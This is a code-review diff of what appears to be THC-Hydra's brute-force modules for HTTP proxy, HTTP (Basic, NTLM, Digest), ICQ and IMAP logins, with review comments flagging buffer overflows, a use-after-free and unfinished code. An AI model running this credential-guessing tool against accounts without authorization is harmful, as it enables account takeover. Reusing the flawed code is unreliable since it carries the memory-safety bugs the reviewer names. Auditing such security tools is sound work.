return 1;
} else
#endif
{
if (buf != NULL) {
buf[strlen(buf) - 1] = '\0';
hydra_report(stderr, "Unsupported Auth type:\n%s\n", buf);
} else {
hydra_report(stderr, "Unsupported Auth type\n");
}
return 3;
}
}
}
ptr = ((char *) index(buf, ' ')) + 1;
if (*ptr == '2' || (*ptr == '3' && *(ptr + 2) == '1') || (*ptr == '3' && *(ptr + 2) == '2')) {
hydra_report_found_host(port, ip, "http-proxy", fp);
hydra_completed_pair_found();
} else {
if (*ptr != '4')
hydra_report(stderr, "[INFO] Unusual return code: %c for %s:%s\n", (char) *(index(buf, ' ') + 1), login, pass);
else if (verbose && *(ptr + 2) == '3')
hydra_report(stderr, "[INFO] Potential success, could be false positive: %s:%s\n", login, pass);
hydra_completed_pair();
}
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_http_proxy(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_HTTP_PROXY, mysslport = PORT_HTTP_PROXY_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_http_proxy(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_http_proxy_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
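
Review bot: In start_http_proxy, host is declared as `char url[210], host[30];` but is filled with `sprintf(host, "Host: %.200s", ptr + 3);` followed by `strcat(host, "\r\n")`, so any miscptr URL with more than about 21 characters after "://" writes past the end of a 30-byte stack buffer. Size host to hold the prefix, the longest accepted hostname and the CRLF, and write it with a bounded call. The bracket test in `host[0] != '['` is also always true because host[0] is the 'H' of "Host: "; the intended check is presumably host[6], otherwise an IPv6 literal is cut at its first colon. Finally, buf is a file-scope pointer that is freed at the end of every call, and on later calls (http_proxy_auth_mechanism no longer AUTH_ERROR) the dummy request is skipped and `hydra_strcasestr(buf, "Proxy-Authenticate: Basic")` reads the freed pointer; set buf to NULL after free and refetch or cache the challenge header separately.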

318
hydra-http.c Normal file
View file

@ -0,0 +1,318 @@
#include "hydra-mod.h"
#include "sasl.h"
extern char *HYDRA_EXIT;
char *buf = NULL;
char *webtarget = NULL;
char *slash = "/";
int webport, freemischttp = 0;
int http_auth_mechanism = AUTH_BASIC;
int start_http(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp, char *type) {
char *empty = "";
char *login, *pass, buffer[500], buffer2[500];
char *header = ""; /* XXX TODO */
char *ptr;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
// we must reset this if buf is NULL and we do MD5 digest
if (buf == NULL && http_auth_mechanism == AUTH_DIGESTMD5)
http_auth_mechanism = AUTH_BASIC;
switch (http_auth_mechanism) {
case AUTH_BASIC:
sprintf(buffer2, "%.50s:%.50s", login, pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
/* again: no snprintf to be portable. dont worry, buffer cant overflow */
if (use_proxy == 1 && proxy_authentication != NULL)
sprintf(buffer, "%s http://%s:%d%.250s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n",
type, webtarget, webport, miscptr, webtarget, buffer2, proxy_authentication, header);
else {
if (use_proxy == 1)
sprintf(buffer, "%s http://%s:%d%.250s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n",
type, webtarget, webport, miscptr, webtarget, buffer2, header);
else
sprintf(buffer, "%s %.250s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", type, miscptr, webtarget, buffer2, header);
}
if (debug)
hydra_report(stderr, "C:%s\n", buffer);
break;
#ifdef LIBOPENSSL
case AUTH_DIGESTMD5:{
char *pbuffer;
pbuffer = hydra_strcasestr(buf, "WWW-Authenticate: Digest ");
strncpy(buffer, pbuffer + strlen("WWW-Authenticate: Digest "), sizeof(buffer));
buffer[sizeof(buffer) - 1] = '\0';
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, type, webtarget, webport, header);
if (buffer2 == NULL) {
return 3;
}
if (debug)
hydra_report(stderr, "C:%s\n", buffer2);
strcpy(buffer, buffer2);
}
break;
#endif
case AUTH_NTLM:{
unsigned char buf1[4096];
unsigned char buf2[4096];
char *pos = NULL;
//send auth and receive challenge
//send auth request: let the server send it's own hostname and domainname
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
/* to be portable, no snprintf, buffer is big enough so it cant overflow */
//send the first..
if (use_proxy == 1 && proxy_authentication != NULL)
sprintf(buffer,
"%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n",
type, webtarget, webport, miscptr, webtarget, buf1, proxy_authentication, header);
else {
if (use_proxy == 1)
sprintf(buffer, "%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n",
type, webtarget, webport, miscptr, webtarget, buf1, header);
else
sprintf(buffer, "%s %s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", type, miscptr, webtarget,
buf1, header);
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive challenge
if (buf != NULL)
free(buf);
buf = hydra_receive_line(s);
while (buf != NULL && (pos = hydra_strcasestr(buf, "WWW-Authenticate: NTLM ")) == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (buf == NULL)
return 1;
if (pos != NULL) {
char *str;
pos += 23;
if ((str = strchr(pos, '\r')) != NULL) {
pos[str - pos] = 0;
}
if ((str = strchr(pos, '\n')) != NULL) {
pos[str - pos] = 0;
}
}
//recover challenge
from64tobits((char *) buf1, pos);
free(buf);
buf = NULL;
//Send response
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
//create the auth response
if (use_proxy == 1 && proxy_authentication != NULL)
sprintf(buffer,
"%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n",
type, webtarget, webport, miscptr, webtarget, buf1, proxy_authentication, header);
else {
if (use_proxy == 1)
sprintf(buffer, "%s http://%s:%d%s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n",
type, webtarget, webport, miscptr, webtarget, buf1, header);
else
sprintf(buffer, "%s %s HTTP/1.0\r\nHost: %s\r\nAuthorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nConnection: keep-alive\r\n%s\r\n", type, miscptr, webtarget,
buf1, header);
}
if (debug)
hydra_report(stderr, "C:%s\n", buffer);
}
break;
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if (buf != NULL)
free(buf);
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
//if server cut the connection, just exit cleanly or
//this will be an infinite loop
if (buf == NULL) {
if (verbose)
hydra_report(stderr, "[ERROR] Server did not answer\n");
return 3;
}
if (debug)
hydra_report(stderr, "S:%s\n", buf);
ptr = ((char *) index(buf, ' ')) + 1;
if (ptr != NULL && (*ptr == '2' || *ptr == '3' || strncmp(ptr, "403", 3) == 0 || strncmp(ptr, "404", 3) == 0)) {
hydra_report_found_host(port, ip, "www", fp);
hydra_completed_pair_found();
if (buf != NULL) {
free(buf);
buf = NULL;
}
} else {
if (ptr != NULL && *ptr != '4')
fprintf(stderr, "[WARNING] Unusual return code: %c for %s:%s\n", (char) *(index(buf, ' ') + 1), login, pass);
//the first authentication type failed, check the type from server header
if ((hydra_strcasestr(buf, "WWW-Authenticate: Basic") == NULL) && (http_auth_mechanism == AUTH_BASIC)) {
//seems the auth supported is not Basic shceme so testing further
int find_auth = 0;
if (hydra_strcasestr(buf, "WWW-Authenticate: NTLM") != NULL) {
http_auth_mechanism = AUTH_NTLM;
find_auth = 1;
}
#ifdef LIBOPENSSL
if (hydra_strcasestr(buf, "WWW-Authenticate: Digest") != NULL) {
http_auth_mechanism = AUTH_DIGESTMD5;
find_auth = 1;
}
#endif
if (find_auth) {
// free(buf);
// buf = NULL;
return 1;
}
}
hydra_completed_pair();
}
// free(buf);
// buf = NULL;
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_http(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, char *type) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_HTTP, mysslport = PORT_HTTP_SSL;
char *ptr, *ptr2;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
if ((webtarget = strstr(miscptr, "://")) != NULL) {
webtarget += strlen("://");
if ((ptr2 = index(webtarget, ':')) != NULL) { /* step over port if present */
*ptr2 = 0;
ptr2++;
ptr = ptr2;
if (*ptr == '/' || (ptr = index(ptr2, '/')) != NULL)
miscptr = ptr;
else
miscptr = slash; /* to make things easier to user */
} else if ((ptr2 = index(webtarget, '/')) != NULL) {
miscptr = malloc(strlen(ptr2) + 1);
freemischttp = 1;
strcpy(miscptr, ptr2);
*ptr2 = 0;
} else
webtarget = NULL;
}
if (cmdlinetarget != NULL && webtarget == NULL)
webtarget = cmdlinetarget;
else if (webtarget == NULL && cmdlinetarget == NULL)
webtarget = hydra_address2string(ip);
if (port != 0)
webport = port;
else if ((options & OPTION_SSL) == 0)
webport = myport;
else
webport = mysslport;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (freemischttp)
free(miscptr);
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_http(sock, ip, port, options, miscptr, fp, type);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
if (freemischttp)
free(miscptr);
hydra_child_exit(0);
return;
default:
if (freemischttp)
free(miscptr);
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
void service_http_get(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_http(ip, sp, options, miscptr, fp, port, "GET");
}
void service_http_head(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_http(ip, sp, options, miscptr, fp, port, "HEAD");
}
int service_http_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
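
Review bot: In the AUTH_NTLM case of start_http, the request is built with sprintf into `buffer[500]` using an unbounded `%s` for miscptr and for buf1, which is a 4096-byte base64 buffer, so the comment "buffer is big enough so it cant overflow" does not hold; the Basic case limits the path with `%.250s` but the NTLM formats do not. Give buffer a size derived from its inputs or bound each field in the format string. In the result check, `ptr = ((char *) index(buf, ' ')) + 1;` followed by `ptr != NULL` cannot detect a missing space, because NULL + 1 is not NULL; test the index() return value before the addition. In the Digest case, `if (buffer2 == NULL)` tests an array and is never true, so a failure inside sasl_digest_md5 goes unnoticed, and pbuffer is used without checking that hydra_strcasestr found the header.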

256
hydra-icq.c Normal file
View file

@ -0,0 +1,256 @@
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
extern int child_head_no;
int seq = 1;
const unsigned char icq5_table[] = {
0x59, 0x60, 0x37, 0x6B, 0x65, 0x62, 0x46, 0x48, 0x53, 0x61, 0x4C,
0x59, 0x60, 0x57, 0x5B, 0x3D, 0x5E, 0x34, 0x6D, 0x36, 0x50, 0x3F,
0x6F, 0x67, 0x53, 0x61, 0x4C, 0x59, 0x40, 0x47, 0x63, 0x39, 0x50,
0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43, 0x69, 0x48, 0x33, 0x31, 0x64,
0x35, 0x5A, 0x4A, 0x42, 0x56, 0x40, 0x67, 0x53, 0x41, 0x07, 0x6C,
0x49, 0x58, 0x3B, 0x4D, 0x46, 0x68, 0x43, 0x69, 0x48, 0x33, 0x31,
0x44, 0x65, 0x62, 0x46, 0x48, 0x53, 0x41, 0x07, 0x6C, 0x69, 0x48,
0x33, 0x51, 0x54, 0x5D, 0x4E, 0x6C, 0x49, 0x38, 0x4B, 0x55, 0x4A,
0x62, 0x46, 0x48, 0x33, 0x51, 0x34, 0x6D, 0x36, 0x50, 0x5F, 0x5F,
0x5F, 0x3F, 0x6F, 0x47, 0x63, 0x59, 0x40, 0x67, 0x33, 0x31, 0x64,
0x35, 0x5A, 0x6A, 0x52, 0x6E, 0x3C, 0x51, 0x34, 0x6D, 0x36, 0x50,
0x5F, 0x5F, 0x3F, 0x4F, 0x37, 0x4B, 0x35, 0x5A, 0x4A, 0x62, 0x66,
0x58, 0x3B, 0x4D, 0x66, 0x58, 0x5B, 0x5D, 0x4E, 0x6C, 0x49, 0x58,
0x3B, 0x4D, 0x66, 0x58, 0x3B, 0x4D, 0x46, 0x48, 0x53, 0x61, 0x4C,
0x59, 0x40, 0x67, 0x33, 0x31, 0x64, 0x55, 0x6A, 0x32, 0x3E, 0x44,
0x45, 0x52, 0x6E, 0x3C, 0x31, 0x64, 0x55, 0x6A, 0x52, 0x4E, 0x6C,
0x69, 0x48, 0x53, 0x61, 0x4C, 0x39, 0x30, 0x6F, 0x47, 0x63, 0x59,
0x60, 0x57, 0x5B, 0x3D, 0x3E, 0x64, 0x35, 0x3A, 0x3A, 0x5A, 0x6A,
0x52, 0x4E, 0x6C, 0x69, 0x48, 0x53, 0x61, 0x6C, 0x49, 0x58, 0x3B,
0x4D, 0x46, 0x68, 0x63, 0x39, 0x50, 0x5F, 0x5F, 0x3F, 0x6F, 0x67,
0x53, 0x41, 0x25, 0x41, 0x3C, 0x51, 0x54, 0x3D, 0x5E, 0x54, 0x5D,
0x4E, 0x4C, 0x39, 0x50, 0x5F, 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43,
0x69, 0x48, 0x33, 0x51, 0x54, 0x5D, 0x6E, 0x3C, 0x31, 0x64, 0x35,
0x5A, 0x00, 0x00
};
void fix_packet(char *buf, int len) {
unsigned long c1, c2;
unsigned long r1, r2;
int pos, key, k;
c1 = buf[8];
c1 <<= 8;
c1 |= buf[4];
c1 <<= 8;
c1 |= buf[2];
c1 <<= 8;
c1 |= buf[6];
r1 = (rand() % (len - 0x18)) + 0x18;
r2 = rand() & 0xff;
c2 = r1;
c2 <<= 8;
c2 |= buf[r1];
c2 <<= 8;
c2 |= r2;
c2 <<= 8;
c2 |= icq5_table[r2];
c2 ^= 0xff00ff;
c1 ^= c2;
buf[0x14] = c1 & 0xff;
buf[0x15] = (c1 >> 8) & 0xff;
buf[0x16] = (c1 >> 16) & 0xff;
buf[0x17] = (c1 >> 24) & 0xff;
key = len * 0x68656c6cL;
key += c1;
pos = 0xa;
for (; pos < len; pos += 4)
k = key + icq5_table[pos & 0xff];
}
void icq_header(char *buf, unsigned short cmd, unsigned long uin) {
buf[0] = 0x02;
buf[1] = 0x00;
buf[2] = cmd & 0xff;
buf[3] = (cmd >> 8) & 0xff;
buf[4] = seq & 0xff;
buf[5] = (seq++ >> 8) & 0xff;
buf[6] = uin & 0xff;
buf[7] = (uin >> 8) & 0xff;
buf[8] = (uin >> 16) & 0xff;
buf[9] = (uin >> 24) & 0xff;
}
int icq_login(int s, char *login, char *pass) {
unsigned long uin = strtoul(login, NULL, 10);
char buf[256];
int len;
bzero(buf, sizeof(buf));
icq_header(buf, 0x03e8, uin);
len = strlen(pass) + 1;
buf[14] = len;
memcpy(&buf[16], pass, len);
buf[16 + len] = 0x78;
buf[24 + len] = 0x04;
buf[29 + len] = 0x02;
buf[39 + len] = 0x08;
buf[41 + len] = 0x78;
return (hydra_send(s, buf, 43 + len, 0));
}
int icq_login_1(int s, char *login) {
unsigned long uin = strtoul(login, NULL, 10);
char buf[64];
icq_header(buf, 0x044c, uin);
return (hydra_send(s, buf, 10, 0));
}
int icq_disconnect(int s, char *login) {
unsigned long uin = strtoul(login, NULL, 10);
char buf[64];
bzero(buf, sizeof(buf));
icq_header(buf, 0x0438, uin);
buf[10] = 20;
memcpy(&buf[12], "B_USER_DISCONNECTED", 20);
buf[32] = 0x5;
return (hydra_send(s, buf, 34, 0));
}
int icq_ack(int s, char *login) {
unsigned long uin = strtoul(login, NULL, 10);
char buf[64];
buf[0] = 0x02;
buf[1] = 0x00;
buf[2] = 0x0a;
buf[3] = 0x0;
buf[4] = seq & 0xff;
buf[5] = (seq >> 8) & 0xff;
buf[6] = uin & 0xff;
buf[7] = (uin >> 8) & 0xff;
buf[8] = (uin >> 16) & 0xff;
buf[9] = (uin >> 24) & 0xff;
return (hydra_send(s, buf, 10, 0));
}
int start_icq(int sock, char *ip, int port, FILE * output, char *miscptr, FILE * fp) {
unsigned char buf[1024];
char *login, *pass;
char *empty = "";
int i, r;
if (strlen(login = hydra_get_next_login()) == 0)
return 2;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
for (i = 0; login[i]; i++)
if (!isdigit((int) login[i])) {
fprintf(stderr, "[ERROR] Invalid UIN %s\n, ignoring.", login);
hydra_completed_pair();
return 2;
}
icq_login(sock, login, pass);
while (1) {
if ((r = hydra_recv(sock, (char *) buf, sizeof(buf))) == 0) {
return 1;
}
if (r < 0) {
if (verbose)
fprintf(stderr, "[ERROR] Process %d: Can not connect [unreachable]\n", (int) getpid());
return 3;
}
if (buf[2] == 0x5a && buf[3] == 0x00) {
hydra_report_found_host(port, ip, "icq", output);
hydra_completed_pair_found();
icq_ack(sock, login);
icq_login_1(sock, login);
hydra_recv(sock, (char *) buf, sizeof(buf));
icq_ack(sock, login);
hydra_recv(sock, (char *) buf, sizeof(buf));
icq_ack(sock, login);
icq_disconnect(sock, login);
break;
} else if ((buf[2] != 10 && buf[2] != 250) || buf[3] != 0) {
hydra_completed_pair();
break;
}
/* if((buf[2] != 10 || buf[3] != 0) && (buf[2] != 250 || buf[3] != 0)) */
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_icq(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_ICQ;
if (port)
myport = port;
port = myport;
if ((options & OPTION_SSL) != 0 && child_head_no == 0) {
fprintf(stderr, "[ERROR] You can not use SSL with ICQ!\n");
hydra_child_exit(0);
}
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1:
if (sock >= 0)
sock = hydra_disconnect(sock);
sock = hydra_connect_udp(ip, myport);
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
next_run = start_icq(sock, ip, port, fp, miscptr, fp);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_icq_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
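
Review bot: In icq_login, the password is copied into `char buf[256]` with `memcpy(&buf[16], pass, len);` and the function then writes up to `buf[41 + len]`, with no upper bound on strlen(pass), so a wordlist entry longer than roughly 213 bytes overruns the stack buffer; `buf[14] = len` also truncates the length to one byte. Reject or truncate over-long passwords before building the packet. fix_packet looks unfinished: its final loop only assigns `k = key + icq5_table[pos & 0xff];` and never writes k back to the packet, `rand() % (len - 0x18)` divides by zero when len is 0x18, and nothing in this file calls the function, so either complete it or drop it. In start_icq, buf[2] and buf[3] are read without checking that hydra_recv returned at least 4 bytes, and the message "Invalid UIN %s\n, ignoring." has the newline in the middle.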

576
hydra-imap.c Normal file
View file

@ -0,0 +1,576 @@
#include "hydra-mod.h"
#include "sasl.h"
extern char *HYDRA_EXIT;
char *buf;
int counter;
int imap_auth_mechanism = AUTH_CLEAR;
char *imap_read_server_capacity(int sock) {
char *ptr = NULL;
int resp = 0;
char *buf = NULL;
do {
if (buf != NULL)
free(buf);
ptr = buf = hydra_receive_line(sock);
if (buf != NULL) {
if (strstr(buf, "CAPABILITY") != NULL && buf[0] == '*') {
resp = 1;
usleep(300000);
/* we got the capability info then get the completed warning info from server */
while (hydra_data_ready(sock)) {
free(buf);
buf = hydra_receive_line(sock);
}
} else {
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
if (isdigit((int) *ptr) && *(ptr + 1) == ' ') {
resp = 1;
}
}
}
} while (buf != NULL && resp == 0);
return buf;
}
int start_imap(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[500], buffer2[500];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
while (hydra_data_ready(s)) {
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
free(buf);
}
switch (imap_auth_mechanism) {
case AUTH_LOGIN:
sprintf(buffer, "%d AUTHENTICATE LOGIN\r\n", counter);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL) {
hydra_report(stderr, "[ERROR] IMAP LOGIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
strcpy(buffer2, login);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL) {
hydra_report(stderr, "[ERROR] IMAP LOGIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
strcpy(buffer2, pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
break;
case AUTH_PLAIN:
sprintf(buffer, "%d AUTHENTICATE PLAIN\r\n", counter);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL) {
hydra_report(stderr, "[ERROR] IMAP PLAIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
memset(buffer, 0, sizeof(buffer));
sasl_plain(buffer, login, pass);
sprintf(buffer, "%.250s\r\n", buffer);
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
case AUTH_CRAMSHA1:
case AUTH_CRAMSHA256:{
int rc = 0;
char *preplogin;
rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);
if (rc) {
return 3;
}
switch (imap_auth_mechanism) {
case AUTH_CRAMMD5:
sprintf(buffer, "%d AUTHENTICATE CRAM-MD5\r\n", counter);
break;
case AUTH_CRAMSHA1:
sprintf(buffer, "%d AUTHENTICATE CRAM-SHA1\r\n", counter);
break;
case AUTH_CRAMSHA256:
sprintf(buffer, "%d AUTHENTICATE CRAM-SHA256\r\n", counter);
break;
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
//get the one-time BASE64 encoded challenge
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) {
switch (imap_auth_mechanism) {
case AUTH_CRAMMD5:
hydra_report(stderr, "[ERROR] IMAP CRAM-MD5 AUTH : %s\n", buf);
break;
case AUTH_CRAMSHA1:
hydra_report(stderr, "[ERROR] IMAP CRAM-SHA1 AUTH : %s\n", buf);
break;
case AUTH_CRAMSHA256:
hydra_report(stderr, "[ERROR] IMAP CRAM-SHA256 AUTH : %s\n", buf);
break;
}
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf + 2);
free(buf);
memset(buffer2, 0, sizeof(buffer2));
switch (imap_auth_mechanism) {
case AUTH_CRAMMD5:{
sasl_cram_md5(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
}
break;
case AUTH_CRAMSHA1:{
sasl_cram_sha1(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
}
break;
case AUTH_CRAMSHA256:{
sasl_cram_sha256(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
}
break;
}
hydra_tobase64((unsigned char *) buffer, strlen(buffer), sizeof(buffer));
sprintf(buffer, "%.250s\r\n", buffer);
free(preplogin);
}
break;
case AUTH_DIGESTMD5:{
sprintf(buffer, "%d AUTHENTICATE DIGEST-MD5\r\n", counter);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) {
hydra_report(stderr, "[ERROR] IMAP DIGEST-MD5 AUTH : %s\n", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf);
free(buf);
if (verbose)
hydra_report(stderr, "DEBUG S: %s\n", buffer);
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "imap", NULL, 0, NULL);
if (buffer2 == NULL)
return 3;
if (verbose)
hydra_report(stderr, "DEBUG C: %s\n", buffer2);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%s\r\n", buffer2);
}
break;
case AUTH_SCRAMSHA1:{
char clientfirstmessagebare[200];
char serverfirstmessage[200];
char *preplogin;
int rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);
if (rc) {
return 3;
}
sprintf(buffer, "%d AUTHENTICATE SCRAM-SHA-1\r\n", counter);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) {
hydra_report(stderr, "[ERROR] IMAP SCRAM-SHA1 AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
snprintf(clientfirstmessagebare, sizeof(clientfirstmessagebare), "n=%s,r=hydra", preplogin);
free(preplogin);
memset(buffer2, 0, sizeof(buffer2));
sprintf(buffer2, "n,,%.200s", clientfirstmessagebare);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
snprintf(buffer, sizeof(buffer), "%s\r\n", buffer2);
